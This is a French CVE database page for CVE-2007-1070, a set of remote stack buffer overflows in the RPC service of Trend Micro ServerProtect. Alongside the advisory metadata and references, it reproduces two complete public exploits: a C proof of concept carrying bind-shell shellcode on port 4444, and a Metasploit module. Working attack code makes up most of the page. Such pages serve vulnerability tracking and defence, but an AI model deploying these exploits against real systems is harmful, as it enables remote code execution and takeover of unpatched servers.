CVE-2007-1070 : Détail

CVE-2007-1070

93.29%V3
Network
2007-02-21
10h00 +00:00
2018-10-16
12h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple stack-based buffer overflows in Trend Micro ServerProtect for Windows and EMC 5.58, and for Network Appliance Filer 5.61 and 5.62, allow remote attackers to execute arbitrary code via crafted RPC requests to TmRpcSrv.dll that trigger overflows when calling the (1) CMON_NetTestConnection, (2) CMON_ActiveUpdate, and (3) CMON_ActiveRollback functions in (a) StCommon.dll, and (4) ENG_SetRealTimeScanConfigInfo and (5) ENG_SendEMail functions in (b) eng50.dll.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 4367

Date de publication : 2007-09-05 22h00 +00:00
Auteur : devcode
EDB Vérifié : Yes

/* * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Trend Micro ServerProtect eng50.dll Stack Overflow * [CVE-2007-1070] * * * Description: * A boundary error within a function in eng50.dll can be * exploited to cause a stack-based buffer overflow via a * specially crafted RPC request to the SpntSvc.exe service. * * Hotfix/Patch: * http://www.trendmicro.com/download/product.asp?productid=17 * * Vulnerable systems: * ServerProtect for Windows 5.58 * ServerProtect for EMC 5.58 * ServerProtect for Network Appliance Filer 5.61 * ServerProtect for Network Appliance Filer 5.62 * * Tested on: * Microsoft Windows 2000 SP4 * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Notes: * <3 TippingPoint for technical details. Had this made few days after * disclosure (few months back), was rlsd on r1918 about a week ago * and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW * I WAS THIS HOT DAYUM * * */ #include <iostream> #include <windows.h> #pragma comment( lib, "ws2_32.lib" ) /* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */ unsigned char uszDceBind[] = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00" "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" "\x88\x88\x28\x25\x5B\xBD\xD1\x11\x9D\x53\x00\x80\xC8\x3A\x5C\x2C" "\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00" "\x2B\x10\x48\x60\x02\x00\x00\x00"; /* rpc_opnum_0 */ unsigned char uszDceCall[] = "\x05\x00\x00\x83\x10\x00\x00\x00\x08\x08\x00\x00\x01\x00\x00\x00" "\xE0\x07\x00\x00\x00\x00\x00\x00\x88\x88\x28\x25\x5B\xBD\xD1\x11" "\x9D\x53\x00\x80\xC8\x3A\x5C\x2C\x04\x00\x03\x00\xD0\x07\x00\x00"; /* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */ unsigned char uszShellcode[] = "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab" "\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2" "\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca" "\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56" "\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37" "\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe" "\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde" "\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04" "\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19" "\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8" "\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81" "\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba" "\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f" "\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d" "\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04" "\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb" "\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90" "\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96" "\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02" "\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85" "\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d" "\x7d\xe0\xa6\xd2\xab\x1f"; void usage( ) { printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n" "\t\t\t(c) 2007 devcode\n\n" "usage: tmicro.exe <ip> <port>\n"); } int main( int argc, char **argv ) { WSADATA wsaData; SOCKET sConnect; SOCKADDR_IN sockAddr; char szRecvBuf[512]; unsigned char uszPacket[2056]; int nRet; if ( argc < 3 ) { usage( ); return -1; } if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) { printf("[-] Unable to startup winsock\n"); return -1; } sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); if ( sConnect == INVALID_SOCKET ) { printf("[-] Invalid socket\n"); return -1; } sockAddr.sin_family = AF_INET; sockAddr.sin_addr.s_addr = inet_addr( argv[1] ); sockAddr.sin_port = htons( atoi( argv[2] ) ); printf("[+] Connecting to %s:%s\n", argv[1], argv[2] ); nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) ); if ( nRet == SOCKET_ERROR ) { printf("[-] Cannot connect to server\n"); closesocket( sConnect ); return -1; } printf("[+] Sending DCE Bind packet...\n"); nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 ); if ( nRet == SOCKET_ERROR ) { printf("[-] Cannot send\n"); closesocket( sConnect ); return -1; } nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); if ( nRet <= 0 ) { printf("[-] Recv failed\n"); closesocket( sConnect ); return -1; } memset( uszPacket, 0x41, sizeof( uszPacket ) ); memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) ); memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 ); /* call ebx, 0x6574131C, TmRpcSrv.dll */ /* jmp ebx, 0x7C4E4A66, kernel32.dll */ memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 ); memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 ); printf("[+] Sending DCE Request packet...\n"); nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 ); if ( nRet == SOCKET_ERROR ) { printf("[-] Cannot send\n"); closesocket( sConnect ); return -1; } printf("[+] Check shell on port 4444 :)\n"); nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); closesocket( sConnect ); return 0; } // milw0rm.com [2007-09-06]
Exploit Database EDB-ID : 16827

Date de publication : 2010-04-29 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: trendmicro_serverprotect.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC def initialize(info = {}) super(update_info(info, 'Name' => 'Trend Micro ServerProtect 5.58 Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ ['CVE', '2007-1070'], ['OSVDB', '33042'], ['BID', '22639'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00", 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => [ [ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x6563124c } ], # CALL EBX - StCommon.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 20 2007')) register_options( [ Opt::RPORT(5168) ], self.class ) end def exploit connect handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") filler = payload.encoded + rand_text_english(1600 - payload.encoded.length) + [target.ret].pack('V') len = filler.length # CMON_NetTestConnection sploit = NDR.long(0x000a0017) + NDR.long(len) + filler + NDR.long(0) print_status("Trying target #{target.name}...") begin dcerpc_call(0, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse end handler disconnect end end

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version r2

    Microsoft>>Windows_2003_server >> Version sp2

      Microsoft>>Windows_nt >> Version *

      Microsoft>>Windows_vista >> Version *

        Microsoft>>Windows_xp >> Version *

        Trend_micro>>Serverprotect >> Version 5.58

          Configuraton 0

          Trend_micro>>Serverprotect >> Version 5.58

            Trend_micro>>Serverprotect >> Version 5.61

              Trend_micro>>Serverprotect >> Version 5.62

                Références

                http://www.kb.cert.org/vuls/id/466609
                Tags : third-party-advisory, x_refsource_CERT-VN
                http://secunia.com/advisories/24243
                Tags : third-party-advisory, x_refsource_SECUNIA
                http://osvdb.org/33042
                Tags : vdb-entry, x_refsource_OSVDB
                http://www.kb.cert.org/vuls/id/630025
                Tags : third-party-advisory, x_refsource_CERT-VN
                http://www.kb.cert.org/vuls/id/730433
                Tags : third-party-advisory, x_refsource_CERT-VN
                http://www.securityfocus.com/bid/22639
                Tags : vdb-entry, x_refsource_BID
                http://www.vupen.com/english/advisories/2007/0670
                Tags : vdb-entry, x_refsource_VUPEN
                http://www.kb.cert.org/vuls/id/349393
                Tags : third-party-advisory, x_refsource_CERT-VN
                http://www.securitytracker.com/id?1017676
                Tags : vdb-entry, x_refsource_SECTRACK